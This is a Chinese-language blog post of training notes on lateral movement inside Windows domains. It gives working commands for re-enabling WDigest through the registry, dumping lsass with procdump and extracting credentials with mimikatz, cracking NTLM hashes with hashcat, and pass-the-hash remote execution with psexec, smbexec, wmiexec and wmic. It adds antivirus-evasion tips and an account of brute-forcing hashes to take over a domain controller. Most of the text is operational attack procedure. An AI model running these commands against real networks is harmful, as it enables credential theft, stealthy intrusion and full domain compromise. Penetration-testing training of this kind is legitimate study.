Day67内网安全-域横向smb&wmi明文|哈希

这节课围绕着这两个协议来讲

知识点一:

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码

Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码

在实战情况下就有可能获取不到明文密码(操作系统高关闭了wdigest,打上了补丁),

针对这种方法,我们有四种方法解决这一类问题

1,利用hash的传递攻击(pth,ptk等和利用)进行移动

2,利用其他服务协议(SMB,WMI等)进行hash移动

三四种方法是围绕怎么得到明文密码

3,利⽤注册表操作开启Wdigest Auth值进⾏获取;前提条件:权限允许

#注册表操作开启Wdigest Auth值

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest ``/v UseLogonCredential ``/t REG_DWORD ``/d 1 ``/f

换成1就是开启

4,利⽤⼯具或第三⽅平台(Hachcat)进⾏破解获取;缺点:容易被杀软杀掉

知识点二

Windows系统的LM HASH及NTLM Hash加密算法,个⼈系统在Windows vista后,服务器系统在 Windows 2003以后,认证⽅式均为NTLM Hash。

案例一Procdump+Mimikatz配合获取

建立在秘密Katz获取失败,就用到Procdump结合,Procdump放到对方服务器上面运行,

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump(注意:需要管理员权限),将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。==》弱密码检测也可以使用此策略!

# procdump 在目标机上执行

procdump -accepteula -ma lsass.exe lsass.dmp

之后就在当前目录会生成一个dmp文件,这个文件dmp就是密码和hash值组成的文件,再用mimikatz把这个dmp文件载入进去,

获取全部的密码:sekurlsa::logonPasswords full

出来了密码

Procdump所有版本都可以运行,刚刚演示我只需要把生成的dmp文件导出来就可以用mimikatz解密,而在实战情况下,我们就只需要把Procdump上传到靶机,然后执行完把dmp文件导入本机,就可以用mimikatz破解获取密码。

可以避免mimikatz在靶机被杀软杀掉的情况

Hashcat 破解获取 Windows NTML Hash

注意好参数就可以了,

Hashcat下载:https://github.com/hashcat/hashcat(kail自带了不用下载)

---密码破解全能工具-Hashcat密码破解攻略:

https://www.freebuf.com/sectool/164507.html

爆破命令:hashcat -a 0 -m 1000 hash file --force

-a, --attack-mode=NUM 攻击模式,其值参考后面对参数。"-a 0"字典攻击,"-a 1" 组合攻击;"-a 3"掩码攻击。(这里是字典攻击)

-m 1000指向的是NTLM Hash哈希协议

hash是要破解的哈希字符串,file为字典的地址

案例二域横向移动 SMB 服务利用-psexec,smbexec

Pstools官方工具包

利用windows上smb'服务,利用明文或者hash进行远程执行的,条件是445端口开放

psexec是windows官方自带的工具,下载好了之后上传到靶机上面,不会被杀软杀掉,

第一种攻击,psexec,第一种使用方式,建立ipc链接,psexec需要明文或者hash进行传递

net use \\192.168.3.32\ipc$ ``"admin!@#45" /user``:administrator

psexec \\192.168.3.32 -s cmd``# 需要先有ipc链接 -s以System权限运行

就对着命令行输入就行

-s是指以system权限运行

psexec的第二种攻击方式,不需要建立ipc链接,直接使用明文或者hash进行传递,

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd

psexec -hashes :$HASH$ .``/administrator``@10.1.2.3

psexec -hashes :$HASH$ domain``/administrator``@10.1.2.3

psexec -hashes :518b98ad4178a53695dc997aa02d455c .``/administrator``@192.168.3.32

官方提供的软件只支持明文传输,想用hash值就要用上一个工具包,impacket,但是不是官方自带的,要做一些免杀,在工具包目录里面运行cmd,在执行这个命令,就直接用hash值传递就是system权限,

这种就不需要建立连接,直接反弹cmd的系统权限回来,

有明文还是最好用官方的,只有hash值才用工具包

smbexec工具

第三方的工具包,要做好免杀,

无需建立ipc链接,明文或者hash值都可以传递;

smbexec god``/administrator``:Admin12345@192.168.3.21

god对域内主机链接,

前面加上god就是让他连接这个ip的的管理用户,不加god就是链接本机的管理用户

hash值,是箭头指向的值。

在对方打了补丁或者开启了那个东西的时候,只能获取hash指,就

建立哈希连接(sqlserver的本地管理员):

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

一样可以系统权限;

案例三域横向移动WMI 服务利用-cscript,wmiexec,wmic

WMI是通过135端口进行连接的,支持用户明文或者hash指的方式进行认证,并且该方法不会在对方日志系统里面留下痕迹,更加隐蔽

第一个链接方式,自带WMI,

不会被查杀;但是需要明文密码,缺点没有回显

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

连接之后,创建cmd程序,执行ipconfig,把结果写入到c盘的1.txt文件

执行完成,

在目标主机就有ipconfig的返回结果

功能有点尴尬,还要二次看回显

自带cscript

不会被查杀,明文密码传输,有回显

但他要借助一个vbs,

wmiexec.vbs脚本下载:

https://www.secpulse.com/wp-content/uploads/2015/05/cache-a360611dc24d240989799c29c555e4b7_wmiexec-v1_1.rar

vbs文件更好做免杀,把vbs放到同一个目录

命令;

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

第三个impacket 套件里面的llwmiexec

支持明文或者hash指传输,有回显,有exe版本,但不是系统自带的容易被查杀,

来到工具包目录执行cmd

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"(或者"ipconfig")

这个套件里面的就直接执行命令

hash指链接

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"

案例四域横向移动以上服务 hash 批量利用-python 编译 exe

总体思路,我们

我们现在是有web服务器权限的权限,通过这个外网ip入侵成功,拿下了这台主机的权限,然后攻击域里面别的主机。

第一步进行信息探针

域用户的信息

域用户的凭据信息收集

探针域内存活主机及其信息

这些都收集完之后,有明文密码也有hash值,利用这些明文和hash值,利用脚本实现批量的爆破, 然后利用成功的hash值执行命令,继续手机用户凭据信息。

在第一台web服务器里,收集到的账户密码和hash值

之后进行ip地址的探针,用自带的命令进行探针

收集好的ip地址写在文档里

在将收集好的域用户名字收集起来,net user /domain

本地登陆的原因,不会收到的域控的管理,不然安装东西,上传脚本都会受到域里的限制

这里前提条件苛刻一些,没有收集到明文密码,只收集到了hash值,

然后写一个pthon的爆破脚本,打包成exe,然后上传到肉鸡上面执行他,然后失败了,没有一个链接成功的,遇见这种情况之后,在脚本里面多写一条命令,写一条登录本地用户组的命令,

在上传上去,

有一条成功了,

就扽古这个192.168.3.29的主机可以拿下,那个这个肉鸡之后,继续用mimikatz获取到用户凭据密码信息,

然后就可以把密码信息更新一下,在利用脚本爆破

又成功了一个,192.168.3.21,域控主机,拿下域控主机就等于拿下了全部主机,

fa

cai

相关推荐
brrdg_sefg44 分钟前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者1 小时前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
独行soc2 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
安全方案5 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全
H4_9Y6 小时前
顶顶通呼叫中心中间件mod_cti模块安全增强,预防盗打风险(mod_cti基于FreeSWITCH)
安全·中间件
Hacker_Oldv6 小时前
网络安全中常用浏览器插件、拓展
安全·web安全
hao_wujing9 小时前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.9 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
鸭梨山大。11 小时前
Jenkins安全部署规范及安全基线
安全·中间件·jenkins